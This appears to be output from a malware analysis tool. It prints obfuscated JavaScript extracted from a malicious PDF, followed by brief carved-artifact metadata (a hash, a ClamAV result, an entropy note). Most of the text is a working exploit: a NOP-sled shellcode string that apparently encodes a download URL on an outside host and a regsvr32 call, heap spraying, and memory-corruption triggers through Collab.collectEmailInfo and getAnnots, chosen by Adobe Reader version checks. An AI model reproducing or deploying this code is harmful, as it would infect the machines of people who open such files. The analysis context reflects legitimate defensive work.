"%u9090%u9090%u9090%u9090%u15e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u00a9%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0093%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9d75%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%ue6e8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6470%u6563%u0078%u7468%u7074%u2f3a%u612f%u6867%u706a%u666b%u6d61%u636c%u632e%u6d6f%u6e2f%u6574%u502f%u4f52%u2e58%u6870%u2f70%u4879%u3766%u3239%u6538%u3461%u3056%u3031%u6630%u3630%u3030%u3630%u3052%u3336%u3033%u3266%u3131%u3230%u6254%u3962%u3934%u3436%u3237%u3330%u306c%u3030%u0063";app.bt8h8__AY = unescape(U5_Q4b(YLS_ToXy5V4DyyJ, dTY_e_r8e_r));var u376jc2MbcQbV_s = 0x400000;var jt7_Kv = y1ri__Hv_0b.length * 2;var Os44U_34RA = u376jc2MbcQbV_s - (jt7_Kv+0x38);U3UL_F_C_dI0 = tqNbHs_Q5y5b(U3UL_F_C_dI0, Os44U_34RA);var K5_7v7w = (XBAs_F_0TA - 0x400000)/u376jc2MbcQbV_s;for (var qWMq_5a = 0; qWMq_5a < K5_7v7w; qWMq_5a++) {Kx__88fbRF[qWMq_5a] = U3UL_F_C_dI0 + y1ri__Hv_0b;}}function kuS6m1Ih67(){var q_5__F_uu0 = "";for (p0__8tTM5__Y5 = 0; p0__8tTM5__Y5 < 12; p0__8tTM5__Y5++) {q_5__F_uu0 += unescape("%u0c0c%u0c0c");}var NwA_T_I = "";for (p0__8tTM5__Y5 = 0; p0__8tTM5__Y5 < 750; p0__8tTM5__Y5++) {NwA_T_I += q_5__F_uu0;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: NwA_T_I});app.clearTimeOut(i_4qcf);}function YULS_8A5(l_X_w7VBOg){var u45_1_fS1 = i_4qcf;if ((l_X_w7VBOg >= 8 && l_X_w7VBOg < 8.11) || l_X_w7VBOg < 7.1) {t_s__Jy54p_L1Tn(23, "%u0c0c%u0c0c", l_X_w7VBOg);app.fP7rY_nQm = kuS6m1Ih67;i_4qcf = app.setTimeOut("app.fP7rY_nQm()", 1);} if (l_X_w7VBOg < 7.12) {function Pw_d_u6__s28V1() {try {t_s__Jy54p_L1Tn(22, "%u0c0c%u0c0c", l_X_w7VBOg);var f6_o_5j__Wk_42 = -0x7CFCFCFD;this.getAnnots(f6_o_5j__Wk_42, f6_o_5j__Wk_42, f6_o_5j__Wk_42, f6_o_5j__Wk_42);} catch(e) {console.println("annots exception error"); }}Pw_d_u6__s28V1();}t_s__Jy54p_L1Tn(13, "%u0c0c%u0c0c", l_X_w7VBOg);if (u45_1_fS1) {app.clearTimeOut(u45_1_fS1);}}var EW__8_6OS = 0;var KhDMM__8__7_5A = app.plugIns;for (var EMI_uw6ri78_qm = 0; EMI_uw6ri78_qm < KhDMM__8__7_5A.length; EMI_uw6ri78_qm++) {var F1iosg_2GT7j = KhDMM__8__7_5A[EMI_uw6ri78_qm].version;if (F1iosg_2GT7j > EW__8_6OS) { EW__8_6OS = F1iosg_2GT7j; }}if (app.viewerVersion == 9.103 && EW__8_6OS < 9.13) {EW__8_6OS = 9.13;}if (!(EW__8_6OS < 9 || EW__8_6OS >= 9.2) ||    !(EW__8_6OS < 8 || EW__8_6OS >= 8.17) ||    !(EW__8_6OS < 7 || EW__8_6OS >= 7.14)) {YULS_8A5(EW__8_6OS);}
u3d_00_off00003596.bin pdf-3d-stream PDF U3D 3D stream at offset 0x3596 27449 bytes
SHA-256: 48816569ab4f370009a917ef6429edbe09e4dfe8a63b00a0a0f75a904c62ba94
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.